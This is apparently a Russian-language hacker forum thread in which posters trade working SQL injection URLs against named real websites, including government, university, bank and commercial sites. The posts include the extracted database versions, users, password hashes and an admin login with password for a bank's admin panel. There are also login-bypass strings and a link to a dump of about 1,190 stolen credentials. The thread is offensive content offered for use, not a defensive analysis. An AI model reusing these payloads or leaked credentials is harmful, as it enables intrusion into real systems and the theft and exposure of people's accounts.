SQL Инъекции

HTML:

http://www.cyclingnorthumbria.co.uk/pages/newscontent.php?ID=-5%20UNION%20SELECT%201,username,user_password,user_icq+FROM+forum_users/*

 

http://www.continental-tc.ru/news.php?nid=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8/*

4.0.27-max-log/cont86_cont/[email protected]

-----------------------------------------------------------------------

http://www.baykalclub.ru/news/news.php?id=-1'+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5/*

4.0.26-log/udb3829/Uwww3829S@localhost

 

hpol.org

Code:

http://www.hpol.org/transcript.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*

5.0.27:hpol:ro@localhost
29 таблиц:

Code:

http://www.hpol.org/transcript.php?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+28,1/*

Интересных таблиц нет...

 

PUGET SOUND-GEORGIA BASIN ENVIRONMENTAL INITIATIVE
http://www.psat.wa.gov/

Code:

http://www.psat.wa.gov/Publications/news_stories/hoodcanal_news_story.php?id=-1+union+select+1,2,3,4,concat(aes_decrypt(aes_encrypt(user,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(password,0x71),0x71),0x71),6,7,8+from+mysql.user/*

4.1.8-standard
root:*00EF6E5ADDE837A950A846F51A37244509B849DBq

 

Calista Luxury Resort
отель в анталии

Code:

http://www.calista.com.tr/calistaweb/news_read.asp?id=99999

 

afilin@localhost:a_filin*5.0.27-log

http://apteka-filin.dp.ua/artcl.php?artcl&id=-1+union+select+1,concat(user(),0x3a,database(),0x2a,version()),3,4,5,6/*

 

НацинвестпромБанк

Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Админка - http://www.nipbank.ru/admin/
Логин: admin
Пасс: nipb
Мой первый инъект в asp)

 

http://www.rosmed.ru/_link_catch.php?link_id=-1+UNION+SELECT+1,2,3,4/*

Идет редирект.

 

pereslavl.ru

Code:

http://www.pereslavl.ru/news/world_news.cgi?show_news=-69144+union+select+1,2,table_name,4,concat_ws(char(58),version(),user(),database()),6,7+from+information_schema.tables+limit+16,8+--+

5.0.22-Debian_2-log:world_news@localhost:world_news

Code:

http://www.pereslavl.ru/forum/ftower.cgi?board_id=-31+union+select+1+from+information_schema.tables+--+

скуля слепая

Пробую
Логин: admin'=1 OR 1=1/*
Пароль: 123

Захожу под Casper, пробую другие ники, все равно захажу как Casper, а он не админ

 

2l-l00K

делай так :admin'=1 OR 1=1 limit 2,1/*

и лимитом переберай

а вот вход под админом

admin' or '1'='1

 

http://www.aim.edu/

Code:

http://www.aim.edu/faculty/facultyresume.asp?id=-1+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+Extuser+where+username+not+in+('gsbhatia','spprasu'))--

Базы:
AIMADB
AIMBeta <- От сайта. Список таблиц:

AIMDB
AlumniPortal
master
Microfinance
model
msdb
Northwind
OSUSData
pubs
tempdb

1190 пользователей (логин:пасс)
http://www.rapidshare.com/files/66783989/lol.txt.html

-------------

Бесполезные скули

http://www.marshall.edu <- нет таблиц, не присутствуют пользователи

Code:

http://www.marshall.edu/www/announce.asp?ID=240+or+1=(select+top+1+table_name+from+information_schema.tables)--

http://appserv02.uncw.edu <- нет доступа к интересным базам\таблицам

Code:

http://appserv02.uncw.edu/news/article.asp?ID=-1+or+1=(select+@@version)--

http://www.fisk.edu/ <- нет доступа к таблицам

Code:

http://www.fisk.edu/page.asp?id=72+or+1=(select+@@version)--

 

HTML:

http://www.bananas-gym.de/docs/newscontent.php?id=36%20UNION%20SELECT%201,username,3,user_password+FROM+phpbb_users/*

Есть ещё таблица sites

Так же есть поле user_icq но ничего не нашёл....короче только админить мона

 

Code:

http://www.gamerevolution.com/news/view.php?id=-3369+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13

User: [email protected]
Version: 4.1.21-standard-log
Database: gamerev

 

Code:

http://www.dukemednews.duke.edu/gallery/index.php?letter=C&isAdmin=399998+union+select+1,version(),3/*

Версия БД: 4.0.18
База: news
Юзер: [email protected]

 

нашёл 2 таблицы member и phpbb_users

 

есть ещё база mysql.user

HTML:

http://www.dukemednews.duke.edu/gallery/index.php?letter=C&isAdmin=399998+union+select+1,concat(user,0x3a,password),3+FROM+mysql.user/*

 

HTML:

http://www.ycegmbh.com/newscontent.php?id=-27%20UNION%20SELECT%201,name,pwd,4,5,6,7,8,9+FROM+admin

adminка

HTML:

http://www.ycegmbh.com/admin/login.php?

 

http://www.hawaii.gov

Version: 4.1.12
User: webuser@ahi
1: administrator:5f4dcc3b5aa765d61d8327deb882cf99:password
2: corinne:7c7727fdda7701ef4998d185b1357442:spoh

http://grande.nal.usda.gov

Version: 4.0.14-log
User: gmoore@localhost

 

Код:

http://www.soldatru.ru/subject_index/subject_show.php?id=-12+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables/*
дальше не рыл-смеялся над ответом сервера

код:

http://eroshop.com.ua/?sec=forum&fit=-20768+union+select+1,2,3,4,5,cast(concat(login,0x3a,password)+as+binary),7,8,9,10+from+users/*
заходим как админ...

 

pcper.com - PC Perspective

Code:

http://www.pcper.com/news.php?s=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15/*

5.0.22CPerspective:root@localhost
34 таблицы:

Code:

http://www.pcper.com/news.php?s=-1+union+select+1,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15+from+information_schema.tables+limit+33,1/*

Интересных таблиц не нашёл...